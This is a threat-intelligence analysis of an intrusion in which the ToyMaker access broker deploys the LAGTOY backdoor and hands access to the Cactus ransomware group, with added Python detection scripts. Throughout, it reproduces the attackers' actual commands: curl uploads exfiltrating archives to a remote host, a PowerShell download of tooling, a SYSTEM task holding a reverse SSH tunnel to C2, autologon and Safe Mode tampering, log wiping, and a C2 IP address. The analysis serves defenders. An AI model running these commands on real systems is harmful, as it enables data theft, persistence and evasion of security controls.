Modern cyberattacks increasingly do not begin with encryption or a public extortion demand. Far more often, the first stage unfolds quietly: someone acquires initial access to corporate systems. This is where specialized actors operate. They do not attack businesses directly but work in the background, laying the groundwork for subsequent incidents. This article examines one such case to show how a modern attack chain is assembled, from the compromise of an external service to the establishment of a foothold inside the infrastructure.
In 2023, a large-scale compromise of a critical infrastructure enterprise was uncovered, involving a combination of several threat actors. From initial access to double extortion, these participants gradually and methodically compromised a large number of hosts across the network, using a mix of dual-use remote administration tools, SSH, and file transfer utilities.
The initial access broker (IAB), provisionally named ToyMaker and assessed with moderate confidence to be financially motivated, exploits vulnerable internet-facing systems. After gaining entry, the actor deploys its own backdoor, LAGTOY, and steals credentials from the victim's infrastructure. LAGTOY is used to establish reverse shell connections and execute commands on infected endpoints.
Compromise via LAGTOY can lead to the transfer of access to a secondary threat actor. In particular, it was observed that ToyMaker handed over access to the Cactus group, a double extortion group that applied its own tactics, techniques, and procedures (TTPs) for further malicious activity within the victim’s network.
Analysis of intrusions across multiple endpoints made it possible to reconstruct a timeline of events, from the initial compromise to the transfer of access and subsequent activity by the secondary actor. Below is a generalized timeline.
Time                       Actor      Activity
Day 0                      ToyMaker   user enumeration; initial reconnaissance; creation of a fake user account; credential extraction using Magnet RAM Capture
+2 days                    ToyMaker   deployment of the LAGTOY implant
(idle period of approximately 3 weeks)
+3 weeks (Day 0 Cactus)    Cactus     endpoint inventory
Day 2 Cactus               Cactus     server and file inventory; removal of indicators of compromise
Day 2–3 Cactus             Cactus     lateral movement across the corporate network
Day 4 Cactus               Cactus     archiving sensitive data for exfiltration and extortion
Day 8 Cactus               Cactus     deployment of remote management tools (eHorus, RMS, AnyDesk); OpenSSH connections
Day 12 Cactus              Cactus     creation of malicious accounts for ransomware deployment; deletion of volume shadow copies; modification of system recovery settings
After the initial intrusion, ToyMaker spent approximately one week conducting initial reconnaissance, extracting credentials, and deploying a backdoor, after which activity ceased. No targeted data exfiltration or attempts at deeper movement toward higher-value assets were observed.
Following a quiet period of around three weeks, the Cactus group appeared in the network, using credentials stolen by ToyMaker. Given the short dwell time, the absence of data theft, and the subsequent transfer of access, it is unlikely that ToyMaker pursued espionage objectives.
As a result, ToyMaker is assessed with moderate confidence as a financially motivated initial access broker that gains access to high-value organizations and transfers it to secondary actors who monetize that access through ransomware and double extortion.
System reconnaissance. Purpose of the commands observed at this stage: discovering information about the system; collecting network information; account creation.
The attacker starts an SSH listener using the Windows OpenSSH daemon (sshd.exe). After that, an SFTP session from another compromised system, served on the host by sftp-server.exe (the OpenSSH SFTP subsystem), is used to download the Magnet RAM Capture executable.
Purpose: extracting credentials from memory
The resulting memory dump is archived:
After that, the archive is exfiltrated using SCP:
Once the memory dumps have been retrieved over the SFTP connection, a custom reverse shell implant named LAGTOY is downloaded and executed.
To establish persistence on the system, a service is created:
The implant connects to a hardcoded C2 server and executes the received commands, including:
LAGTOY is a simple but effective backdoor. It periodically communicates with its C2 server, executes commands on the infected system, operates as a service, and includes basic anti-debugging mechanisms before establishing a connection.

As an anti-debugging technique, the malware registers its own unhandled exception handler with kernel32!SetUnhandledExceptionFilter(). When a process runs under a debugger, a user-registered handler is not invoked; the exception goes straight to the debugger instead. Accordingly, if the handler has been registered and execution later reaches it when an exception is raised, the implant concludes that it is not being debugged. The check is easy to defeat by patching the handler registration or the code that raises the exception, so it is a speed bump for analysts rather than real protection.
LAGTOY is designed to operate on the infected system as a service named “WmiPrvSV.”
The IP address and port of the command-and-control (C2) server are hardcoded in LAGTOY. Communication takes place over TCP port 443 using a plain socket with no TLS, even though TLS is what would normally be expected on that port; this mismatch between port and protocol is itself a useful detection signal.
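The port/protocol mismatch is something a network sensor can check directly. The following is an added example (not tooling from the original report) that inspects the first client-to-server bytes of flows to TCP/443 and flags any that do not begin with a TLS ClientHello; the flow records and their field names are constructed for the illustration.

```python
"""Flag TCP flows to port 443 whose first client bytes are not a TLS ClientHello.

Added illustration, not tooling from the original report. LAGTOY reaches its C2
on TCP/443 over a plain socket without TLS, so the first client-to-server
payload of such a flow never looks like a TLS handshake. The flows below are
constructed samples, not captured traffic; the field names are assumptions.
"""
from __future__ import annotations

from typing import Iterable

TLS_HANDSHAKE = 0x16  # TLS record content type: handshake
CLIENT_HELLO = 0x01   # handshake message type: ClientHello
TLS_MAJOR = 0x03      # every SSL3/TLS version uses major version 3 on the wire


def looks_like_tls_client_hello(payload: bytes) -> bool:
    """True if payload starts with a TLS record that carries a ClientHello.

    Record header: type(1) version(2) length(2), followed by the handshake
    message type(1). Accepts record versions 0x0300 (SSL 3.0) to 0x0304.
    """
    if len(payload) < 6:
        return False
    if payload[0] != TLS_HANDSHAKE or payload[1] != TLS_MAJOR or payload[2] > 0x04:
        return False
    record_len = int.from_bytes(payload[3:5], "big")
    return record_len > 0 and payload[5] == CLIENT_HELLO


def classify_first_bytes(payload: bytes) -> str:
    """Coarse label for the first client payload, so an alert says what it saw."""
    if looks_like_tls_client_hello(payload):
        return "tls"
    if payload.startswith((b"GET ", b"POST ", b"HEAD ", b"CONNECT ")):
        return "plaintext-http"
    if payload.startswith(b"SSH-"):
        return "ssh"
    if payload and all(32 <= b < 127 or b in b"\r\n\t" for b in payload):
        return "printable-non-tls"
    return "binary-non-tls"


def flag_non_tls_443(flows: Iterable[dict]) -> list[dict]:
    """Return the flows to port 443 whose first client payload is not TLS.

    Each flow is a dict with src, dst, dst_port and first_client_bytes.
    """
    alerts = []
    for flow in flows:
        if flow["dst_port"] != 443:
            continue
        label = classify_first_bytes(flow["first_client_bytes"])
        if label != "tls":
            alerts.append({**flow, "label": label})
    return alerts


# Constructed samples (documentation address ranges, not real observations).
# A TLS 1.0 record header carrying a TLS 1.2 ClientHello, padded with zeros.
CLIENT_HELLO_SAMPLE = bytes([0x16, 0x03, 0x01, 0x00, 0xC5, 0x01, 0x00, 0x00, 0xC1, 0x03, 0x03]) + b"\x00" * 32

SAMPLE_FLOWS = [
    {"src": "10.0.0.5", "dst": "203.0.113.10", "dst_port": 443, "first_client_bytes": CLIENT_HELLO_SAMPLE},
    {"src": "10.0.0.7", "dst": "203.0.113.20", "dst_port": 443, "first_client_bytes": b"\x00\x00\x00\x0c\x01\x02\x03\x04"},
    {"src": "10.0.0.9", "dst": "203.0.113.30", "dst_port": 443, "first_client_bytes": b"GET / HTTP/1.1\r\nHost: x\r\n"},
    {"src": "10.0.0.9", "dst": "203.0.113.30", "dst_port": 8443, "first_client_bytes": b"\x01\x02\x03"},
]

if __name__ == "__main__":
    for alert in flag_non_tls_443(SAMPLE_FLOWS):
        print(f"{alert['src']} -> {alert['dst']}:{alert['dst_port']} first bytes look like {alert['label']}")
```

A first-bytes check is cheap but narrow: it catches a plaintext protocol on 443, not malicious traffic that is properly wrapped in TLS, and a proxy or load balancer that terminates TLS in front of the sensor will hide the mismatch.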

The C2 server sends LAGTOY special administrative codes:
#pt – stop the service.
#pd – interrupt the current execution chain and check whether the service is stopped. If the service is stopped, switch to Sleep mode for a specified period of time and then reinitiate the connection to the C2 server.
#ps – simply create the specified process or execute the given command.
If the code does not start with the # character, LAGTOY simply executes the received command or process name on the endpoint.

Compared to the sample identified by Mandiant in 2022, this variant added the #ps handler, which is intended to create a process from the supplied command.

LAGTOY uses its own timing logic to decide whether commands should be executed or whether it should enter Sleep mode for a defined period. With high confidence, this logic is assessed to be a unique, custom implementation specific to the LAGTOY implant family.
LAGTOY is capable of processing three commands from the C2 server, with a Sleep interval of 11,000 milliseconds between them. During the beaconing cycle, it records the time of the last successful connection to the C2 server and the last successful command execution. If commands received from the C2 server are not successfully executed for at least 30 minutes, the implant sends an error status message to the C2 server indicating command execution failure.
LAGTOY includes a built-in watchdog mechanism. If the implant runs for a cumulative period exceeding 60 minutes, it stops executing commands and checks whether the service has been stopped. If the service remains active, the implant reinitiates a connection to the C2 server.
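A fixed sleep between polls is also a detection opportunity. The block below is an added example, not part of the original analysis: it groups connection log entries by (source, destination, port) and scores how regular the inter-arrival times are, using medians so that the implant's 30- and 60-minute pauses do not mask the pattern. It assumes each poll appears as its own log entry (a long-lived socket would instead show up as a single long flow); the events and addresses are constructed.

```python
"""Detect fixed-interval beaconing from per-connection timestamps.

Added example, not from the original report. LAGTOY sleeps a fixed 11,000 ms
between polls of its C2; a constant sleep with no jitter leaves a telltale
inter-arrival pattern for the (source, destination, port) pair. The events
below are constructed, not real telemetry, and the check assumes each poll
shows up as its own log entry.
"""
from __future__ import annotations

from collections import defaultdict
from statistics import median
from typing import Iterable, Sequence


def interarrival(timestamps: Sequence[float]) -> list[float]:
    """Gaps between consecutive timestamps, in seconds."""
    ts = sorted(timestamps)
    return [later - earlier for earlier, later in zip(ts, ts[1:])]


def beacon_score(timestamps: Sequence[float], min_connections: int = 8):
    """Return (median_interval, relative_jitter), or None if too few samples.

    relative_jitter = median absolute deviation of the gaps / median gap.
    A process sleeping a constant time scores near 0; interactive use near 1.
    Medians are used so a few long outages (the implant's 30/60-minute pauses)
    do not wash out the regular pattern.
    """
    if len(timestamps) < min_connections:
        return None
    gaps = interarrival(timestamps)
    med = median(gaps)
    if med <= 0:
        return None
    mad = median(abs(g - med) for g in gaps)
    return med, mad / med


def find_beacons(events: Iterable[tuple], max_jitter: float = 0.1,
                 min_connections: int = 8) -> list[dict]:
    """events: (src_ip, dst_ip, dst_port, epoch_seconds) tuples, any order."""
    by_pair: dict[tuple, list[float]] = defaultdict(list)
    for src, dst, port, ts in events:
        by_pair[(src, dst, port)].append(ts)
    hits = []
    for (src, dst, port), stamps in by_pair.items():
        score = beacon_score(stamps, min_connections)
        if score is None:
            continue
        interval, jitter = score
        if jitter <= max_jitter:
            hits.append({"src": src, "dst": dst, "dst_port": port,
                         "interval_s": round(interval, 1), "jitter": round(jitter, 3),
                         "connections": len(stamps)})
    return hits


BASE = 1_700_000_000  # arbitrary epoch anchor for the constructed samples

# Constructed: an implant polling every ~11 s, a user browsing, and a pair with
# too few events to judge.
SAMPLE_EVENTS = (
    [("10.0.0.5", "203.0.113.20", 443, BASE + o) for o in (0, 11, 22, 34, 45, 55, 66, 77, 89, 100)]
    + [("10.0.0.7", "198.51.100.9", 443, BASE + o) for o in (0, 3, 40, 41, 120, 300, 305, 900, 901, 1500)]
    + [("10.0.0.8", "203.0.113.50", 443, BASE + o) for o in (0, 11, 22)]
)

if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_EVENTS):
        print(hit)
```

The jitter threshold is the tuning knob: implants that randomize their sleep will score higher, so in practice the check is run per time window and combined with the destination's reputation and the port/protocol mismatch noted earlier.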

Almost a month after ToyMaker established access to the victim organization’s infrastructure, the actor transferred this access to a secondary threat actor affiliated with the Cactus ransomware group, which primarily conducts ransomware and double extortion attacks.
The Cactus group carried out its own reconnaissance and persistence activities, deploying its own malware toolset instead of using LAGTOY as a mechanism for further penetration into the corporate network. Initial access to the compromised endpoint was obtained using user credentials previously stolen by ToyMaker with the Magnet RAM Capture tool.
Cactus immediately began network scanning to identify valuable systems and enable further lateral movement. To do so, an initial WSMAN discovery script was executed, allowing the attackers to enumerate all endpoints configured to handle PowerShell remoting.
Command:
Purpose: Remote System Discovery [T1018]
Follow-up included archiving and transferring results:
C:\PerfLogs\Admin\7z.exe a -p<password> pss.7z .\result.csv
C:\PerfLogs\Admin\curl.exe -k -T .\pss.7z hxxps://<remote_ip>:8443
C:\PerfLogs\Admin\7z.exe a -p<pwd> .\CP-SERVER3.7z .\CP-SERVER3.txt
C:\PerfLogs\Admin\7z.exe a -p<pwd> .\FILEN01.7z .\FILEN01.txt
C:\PerfLogs\Admin\curl.exe -k -T .\CP-SERVER3.7z hxxps://<remote_ip>:8443
C:\PerfLogs\Admin\curl.exe -k -T .\FILEN01.7z hxxps://<remote_ip>:8443
C:\PerfLogs\Admin\7z.exe a -p<pwd> .\FILE-SERVER.7z .\FILE-SERVER.txt
C:\PerfLogs\Admin\curl.exe -k -T .\FILE-SERVER.7z hxxps://<remote_ip>:8443
The collected results were compressed and uploaded to a remote server; the same was done for other gathered information. Purpose: data exfiltration [T1048]. In the curl commands, -T uploads the named file and -k disables certificate validation, so a self-signed certificate on the attacker's server is accepted without complaint.
Commands and purpose:
C:\Windows\system32\reg.exe delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
Purpose: remove indicators, clear command history [T1070]
C:\Windows\system32\reg.exe delete HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default /va /f
C:\Windows\system32\reg.exe delete HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers /f
C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers
C:\Windows\system32\attrib.exe %userprofile%\documents\Default.rdp -s -h
Purpose: remove indicators, clear history of network connections and configurations [T1070]
net user support /delete
Purpose: removing indicators, cleaning up persistence mechanisms [T1070]
The stolen credentials gave Cactus access to a large number of systems, where the actor searched for valuable information. Identified files were either archived and exfiltrated with dual-use tools such as 7-Zip and curl, or transferred directly with file transfer utilities, including WinSCP [T1560, T1048].
Archiving command used to stage data for exfiltration (-mx0 stores without compression for speed, -v4g splits the output into 4 GB volumes, -spf keeps full paths, -p sets an archive password, and the -xr! switches recursively exclude binaries, media, logs and other low-value file types so that only documents and data are collected):
C:\PerfLogs\Admin\7z.exe a -t7z -mx0 -v4g -spf -scsUTF-8 -bsp1 -ssw -p<password> -xr!*.ipa -xr!*.apk -xr!*.zip -xr!*.rar -xr!*.iso -xr!*.dll -xr!*.dl_ -xr!*.lib -xr!*.exe -xr!*.ex_ -xr!*.lnk -xr!*.pdb -xr!*.cab -xr!*.msp -xr!*.bak -xr!*.old -xr!*.bmp -xr!*.gif -xr!*.jpg -xr!*.png -xr!*.avi -xr!*.m4v -xr!*.mp4 -xr!*.mp3 -xr!*.wmv -xr!*.wav -xr!*.mov -xr!*.mkv -xr!*.log -xr!*.csv -xr!*.jar -xr!test\ -xr!tests\ -xr!jdk8\ e:\tmp\<filename>
On other endpoints the attackers located and archived what appears to be the victim's customer data for later exfiltration [T1560, T1048]; here -mhe=on additionally encrypts the archive headers, so even the file names are unreadable without the password:
C:\Windows\system32\cmd.exe /c <path>\7z.exe a -t7z -mx0 -ssp -spf -v5g -y -r -mhe=on <path>\0001.7z <path>\Private Folder\Customers\<path> -p<password>
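The 7-Zip switches above are the staging signature a defender can key on. The following is an added example, not the report's own tooling: it parses 7z.exe command lines from process-creation telemetry, extracts the indicators seen in the commands on this page (password, -mx0, volume splitting, -mhe=on, exclusion of binaries and media), and links each archive to a later curl -T upload. The sample command lines, paths and hosts are constructed to mirror the page's placeholders.

```python
"""Triage 7-Zip and curl command lines from process-creation logs for data staging.

Added example, not tooling from the original report. It reads the switches the
page's archiving commands rely on (-p, -mx0, -v4g/-v5g, -mhe=on, -spf, -xr!)
and pairs each archive with a later curl -T upload. The command lines below
are constructed to mirror the page's placeholders; paths and hosts are made up.
"""
from __future__ import annotations

import re
import shlex


def _basename(path: str) -> str:
    return re.split(r"[\\/]", path.strip('"'))[-1].lower()


def parse_7z(cmdline: str) -> dict | None:
    """Extract the staging-relevant switches from a 7z.exe invocation, if any.

    Works for command lines wrapped in cmd.exe /c; switches may appear after
    the file arguments, as with the trailing -p<password> on this page.
    """
    tokens = shlex.split(cmdline, posix=False)  # Windows quoting, keep backslashes
    start = next((i for i, t in enumerate(tokens) if t.strip('"').lower().endswith("7z.exe")), None)
    if start is None or len(tokens) < start + 2:
        return None
    args = tokens[start + 1:]
    info = {"command": args[0], "password": False, "store_only": False, "volume": None,
            "encrypt_headers": False, "full_paths": False, "exclusions": [],
            "archive": None, "inputs": []}
    positional = []
    for arg in args[1:]:
        if arg.startswith("-"):
            if arg.startswith("-p"):
                info["password"] = True            # password-protected archive
            elif re.fullmatch(r"-mx=?0", arg):
                info["store_only"] = True          # no compression: speed over size
            elif arg.startswith("-v"):
                info["volume"] = arg[2:]           # split archive, e.g. 4g
            elif arg.lower() == "-mhe=on":
                info["encrypt_headers"] = True     # file names hidden without password
            elif arg == "-spf":
                info["full_paths"] = True
            elif arg.startswith(("-xr!", "-x!")):
                info["exclusions"].append(arg.split("!", 1)[1].lower())
        else:
            positional.append(arg)
    if positional:
        info["archive"], info["inputs"] = positional[0], positional[1:]
    return info


def staging_reasons(info: dict) -> list[str]:
    """Why an 'add' invocation looks like exfiltration staging rather than admin work."""
    if info["command"] != "a":
        return []
    reasons = []
    if info["password"]:
        reasons.append("password-protected archive")
    if info["encrypt_headers"]:
        reasons.append("-mhe=on hides file names")
    if info["store_only"]:
        reasons.append("-mx0 store-only, optimised for speed")
    if info["volume"]:
        reasons.append(f"split into {info['volume']} volumes")
    if {"*.exe", "*.dll"} <= set(info["exclusions"]):
        reasons.append("excludes binaries, i.e. selects documents/data")
    return reasons


def curl_uploads(cmdlines: list[str]) -> dict[str, str]:
    """Map uploaded file basename -> URL for every 'curl -T <file> <url>' seen."""
    uploads = {}
    for line in cmdlines:
        tokens = shlex.split(line, posix=False)
        if not tokens or not tokens[0].strip('"').lower().endswith(("curl.exe", "curl")):
            continue
        if "-T" in tokens and tokens.index("-T") + 1 < len(tokens):
            url = next((t for t in tokens if "://" in t), "?")
            uploads[_basename(tokens[tokens.index("-T") + 1])] = url
    return uploads


def triage(cmdlines: list[str], threshold: int = 2) -> list[dict]:
    """Return archive invocations with at least `threshold` staging indicators."""
    uploads = curl_uploads(cmdlines)
    findings = []
    for line in cmdlines:
        info = parse_7z(line)
        if not info or not info["archive"]:
            continue
        reasons = staging_reasons(info)
        url = uploads.get(_basename(info["archive"]))
        if url:
            reasons.append(f"archive later uploaded to {url}")
        if len(reasons) >= threshold:
            findings.append({"archive": info["archive"], "reasons": reasons, "cmdline": line})
    return findings


# Constructed sample command lines modelled on the page; hosts and paths are made up.
EXCLUDE = " ".join(f"-xr!*.{ext}" for ext in ("exe", "dll", "zip", "jpg", "mp4", "log"))
SAMPLE_CMDLINES = [
    r"C:\PerfLogs\Admin\7z.exe a -p<password> pss.7z .\result.csv",
    r"C:\PerfLogs\Admin\curl.exe -k -T .\pss.7z https://203.0.113.10:8443",  # -k: accept any certificate
    rf"C:\PerfLogs\Admin\7z.exe a -t7z -mx0 -v4g -spf -scsUTF-8 -bsp1 -ssw -p<password> {EXCLUDE} e:\tmp\share.7z D:\Shares\Finance",
    r'C:\Windows\system32\cmd.exe /c C:\Temp\7z.exe a -t7z -mx0 -ssp -spf -v5g -y -r -mhe=on C:\Temp\0001.7z "C:\Data\Private Folder\Customers" -p<password>',
    r'"C:\Program Files\7-Zip\7z.exe" x backup.7z -oC:\restore',  # benign restore, not flagged
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_CMDLINES):
        print(finding["archive"], "->", "; ".join(finding["reasons"]))
```

The password value itself is usually visible in the command line, which is a forensic gift: if the staged volumes are recovered from disk or from a network capture, they can be opened.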
Cactus used a variety of remote administration tools across different endpoints to maintain long-term access. The tools observed included:
eHorus Agent: remote management software, also known as Pandora RC
AnyDesk: a remote desktop application
Remote Utilities for Windows Admin (RMS Remote Admin): a Russian-origin remote administration platform
OpenSSH: an SSH package included with Windows and available for installation on the operating system
The remote administration utilities were downloaded from attacker-controlled hosts using PowerShell, with the commands executed remotely through Impacket. The 1> \\127.0.0.1\ADMIN$\__<random> 2>&1 redirection, which writes the command output to a file on the ADMIN$ share for the tool to read back, is the characteristic signature of Impacket's wmiexec/smbexec-style execution and is worth a detection rule on its own.
Commands and purpose:
cmd.exe /Q /c powershell iwr -Uri http://<remote_IP>:7423/file.msi -OutFile C:\Programdata\f.msi 1> \\127.0.0.1\ADMIN$\__<random> 2>&1
Purpose: staging the installer on attacker infrastructure [T1608] and transferring it to the victim host (ingress tool transfer [T1105])
cmd.exe /Q /c msiexec.exe /i C:\Programdata\f.msi /q EHUSER=<username> STARTEHORUSSERVICE=1 DESKTOPSHORTCUT=0 1> \\127.0.0.1\ADMIN$\__<random> 2>&1
Purpose: execution via system binary, Msiexec [T1218]
In other cases the attackers maintained access through OpenSSH. A scheduled task running as SYSTEM is started hourly; its command is an endless loop that opens a reverse SSH tunnel (-R) to the C2 server on port 443, authenticating with a private key stored under a misleading name, and retries every 15 seconds whenever the connection drops. Because -R 25369 names only a port and no destination, OpenSSH treats it as a reverse dynamic forward: anything the operators send to port 25369 on their server is proxied into the victim's network by the ssh.exe process on the compromised host (-N runs no remote command, -C compresses, -q keeps it quiet and -f backgrounds it).
Commands and purpose:
SCHTASKS /CREATE /RU SYSTEM /SC HOURLY /ST 14:00 /F /TN GoogleUpdateTaskMachine /TR cmd /c c:\Windows\temp\sys_log.bat > c:\Windows\temp\log.txt
Purpose: scheduled task/job [T1053]
SCHTASKS /CREATE /RU SYSTEM /SC HOURLY /ST 14:00 /F /TN GoogleUpdateTaskMachine /TR cmd /c FOR /L %N IN () DO (C:\ProgramData\ssh\ssh.exe -o "StrictHostKeyChecking no" root@<remote_ip> -p 443 -R 25369 -NCqf -i "C:\Windows\temp\syslog.txt" & timeout /t 15)
Purpose: scheduled task/job [T1053]; remote services, SSH [T1021]
The Cactus group pays attention to operational security. Access to the file containing the private SSH key used for the tunnel is restricted so that, under normal conditions, the victim's administrators cannot read it: inheritance is disabled, the Administrators group and the interactive user are removed from the ACL, and SYSTEM is granted full control. Since the scheduled task runs as SYSTEM, the tunnel keeps working while casual inspection fails; an administrator can still recover the key by taking ownership of the file first.
Commands and purpose:
icacls C:\Windows\Temp\syslog.txt
icacls.exe C:\Windows\temp\syslog.txt /c /t /inheritance:d
icacls.exe C:\Windows\Temp\syslog.txt /c /t /remove BUILTIN\Administrators
icacls.exe C:\Windows\Temp\syslog.txt /c /t /remove <userid>
icacls.exe C:\Windows\temp\syslog.txt /inheritance:r /grant SYSTEM:F
Purpose: changing file and directory permissions in Windows [T1222]
The file syslog.txt is a private key that the threat actor uses to initiate SSH connections to attacker-controlled infrastructure.
On some endpoints the operators created new unauthorized local accounts, likely to facilitate ransomware deployment, and set the Winlogon values that control automatic logon: DefaultUserName names the account, AutoLogonCount=1 permits a single automatic logon, and LegalNoticeText is cleared because a logon banner would otherwise require a keypress and block the automatic logon:
net user whiteninja <password> /add
reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v LegalNoticeText /t REG_SZ /d /f
reg add HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon /v DefaultUserName /t REG_SZ /d whiteninja /f
reg add HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon /v AutoLogonCount /t REG_DWORD /d 1 /f
During the investigation, it was discovered that the threat actor executed commands to reboot compromised hosts into Safe Mode:
bcdedit /set {default} safeboot minimal
shutdown -r -f -t 0
Booting into Safe Mode is used to disable security controls, because only a minimal set of drivers and services is loaded. Many security products are inactive or run with limited functionality in Safe Mode, which lets the attacker modify registry keys or settings to fully disable protection [T1562.001]. Combined with the automatic logon configured above, the host reboots into Safe Mode and logs the attacker's account in without any interaction.
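The commands in this and the preceding sections (the Impacket-style output redirection, the SYSTEM scheduled task holding a reverse SSH tunnel, the icacls lock-down of the key file, the Winlogon auto-logon values, the MRU cleanup and the safeboot change) each leave a distinctive process command line. The block below is an added example, not detection content from the original report: it applies one regular expression per tradecraft element to process-creation events and then correlates the hits per host, because the combinations (auto-logon plus safeboot, SYSTEM task plus ssh -R) are far more telling than any single command. Hostnames, addresses and the sample events are constructed.

```python
"""Rule-based triage of Windows process-creation command lines for the
Cactus post-access tradecraft shown on this page.

Added example, not the report's own detection content. The rules match the
shapes of the page's commands; a second pass correlates rules per host.
Hostnames, IPs and the sample command lines are constructed.
"""
from __future__ import annotations

import re
from collections import defaultdict

RULES = [
    ("impacket_output_redirect", r"1>\s*\\\\127\.0\.0\.1\\ADMIN\$\\__"),
    ("web_transfer", r"\b(?:iwr|Invoke-WebRequest|DownloadFile|curl)\b.*?\bhttps?://"),
    ("schtasks_as_system", r"\bschtasks(?:\.exe)?\b.*?/create\b.*?/ru\s+system\b"),
    ("ssh_reverse_tunnel", r"\bssh(?:\.exe)?\b.*?\s-R\s+\d+"),
    ("icacls_lock_to_system", r"\bicacls(?:\.exe)?\b.*?(?:/remove\s+(?:BUILTIN\\)?Administrators|/grant\s+SYSTEM:F)"),
    ("winlogon_autologon", r"\\Winlogon\b.*?/v\s+(?:AutoAdminLogon|DefaultUserName|DefaultPassword|AutoLogonCount|LegalNoticeText)\b"),
    ("safeboot", r"\bbcdedit(?:\.exe)?\b.*?\bsafeboot\b"),
    ("mru_cleanup", r"\breg(?:\.exe)?\s+delete\b.*?(?:\\RunMRU\b|Terminal Server Client)"),
    ("local_account_add", r"\bnet1?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b"),
    ("local_account_delete", r"\bnet1?(?:\.exe)?\s+user\s+\S+\s+/delete\b"),
]
COMPILED = [(name, re.compile(pattern, re.IGNORECASE)) for name, pattern in RULES]

# Combinations that are far more telling than any single command.
CORRELATIONS = {
    "safe_mode_autologon": {"winlogon_autologon", "safeboot"},
    "system_task_reverse_ssh": {"schtasks_as_system", "ssh_reverse_tunnel"},
    "ssh_key_locked_to_system": {"ssh_reverse_tunnel", "icacls_lock_to_system"},
    "remote_exec_tool_download": {"impacket_output_redirect", "web_transfer"},
}


def match_rules(cmdline: str) -> list[str]:
    """Names of every rule whose pattern matches the command line."""
    return [name for name, rx in COMPILED if rx.search(cmdline)]


def triage(events: list[dict]) -> dict[str, dict]:
    """events: dicts with 'host' and 'cmdline'. Returns per-host rules and correlated findings."""
    seen: dict[str, set[str]] = defaultdict(set)
    for ev in events:
        seen[ev["host"]].update(match_rules(ev["cmdline"]))
    result = {}
    for host, rules in seen.items():
        findings = sorted(name for name, needed in CORRELATIONS.items() if needed <= rules)
        result[host] = {"rules": sorted(rules), "findings": findings}
    return result


# Constructed process-creation events modelled on the page's commands.
SAMPLE_EVENTS = [
    {"host": "WS-042", "cmdline": r"cmd.exe /Q /c powershell iwr -Uri http://203.0.113.5:7423/file.msi -OutFile C:\Programdata\f.msi 1> \\127.0.0.1\ADMIN$\__<random> 2>&1"},
    {"host": "WS-042", "cmdline": r'SCHTASKS /CREATE /RU SYSTEM /SC HOURLY /ST 14:00 /F /TN GoogleUpdateTaskMachine /TR "cmd /c C:\ProgramData\ssh\ssh.exe -o StrictHostKeyChecking=no root@203.0.113.7 -p 443 -R 25369 -NCqf -i C:\Windows\temp\syslog.txt"'},
    {"host": "WS-042", "cmdline": r"icacls.exe C:\Windows\temp\syslog.txt /inheritance:r /grant SYSTEM:F"},
    {"host": "WS-042", "cmdline": r"net user whiteninja <password> /add"},
    {"host": "WS-042", "cmdline": r"reg add HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon /v DefaultUserName /t REG_SZ /d whiteninja /f"},
    {"host": "WS-042", "cmdline": r"bcdedit /set {default} safeboot minimal"},
    {"host": "SRV-07", "cmdline": r"C:\Windows\system32\reg.exe delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f"},
    {"host": "SRV-07", "cmdline": r"net user support /delete"},
    {"host": "FS-01", "cmdline": r"reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion /v ProductName"},
    {"host": "FS-01", "cmdline": r"schtasks /query /tn GoogleUpdateTaskMachine"},
]

if __name__ == "__main__":
    for host, summary in triage(SAMPLE_EVENTS).items():
        print(host, summary)
```

The patterns need to be adapted to the telemetry's command-line format (Sysmon event ID 1, or Windows event 4688 with command-line auditing enabled); without command-line logging none of these rules has anything to match, which is itself the first gap to close.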
Cactus also actively used the Windows binaries PuTTY and ApacheBench with Metasploit shellcode injected into them. ApacheBench is a benchmarking tool for Apache HTTP servers; in this case the trojanized binary served only as a vehicle for code execution on compromised systems.
These binaries established connections to the same remote server used to host the portable eHorus agent, specifically 51[.]81[.]42[.]234, over ports 53, 443, 8343, and 9232. In addition, Cactus deployed Metasploit-generated ELF binaries that also communicated with the same C2 server, 51[.]81[.]42[.]234.
Figure: Metasploit shellcode communicating with a remote server.
This case clearly demonstrates that a modern cyberattack begins long before ransomware appears. A key role is played by initial access brokers, who quietly infiltrate the network, establish persistence, harvest credentials, and prepare the infrastructure for subsequent attack stages. Access is then handed over to specialized groups that scale the compromise, exfiltrate data, and carry out double extortion.
The clear separation of roles between ToyMaker and Cactus illustrates a mature, market-driven cybercrime model, where an attack is the result of a chain of interconnected actions rather than a single intrusion. From a defensive perspective, this leads to one critical conclusion: it is essential to detect threats at the initial access stage, before they escalate into a full-scale incident with serious consequences for business operations and infrastructure.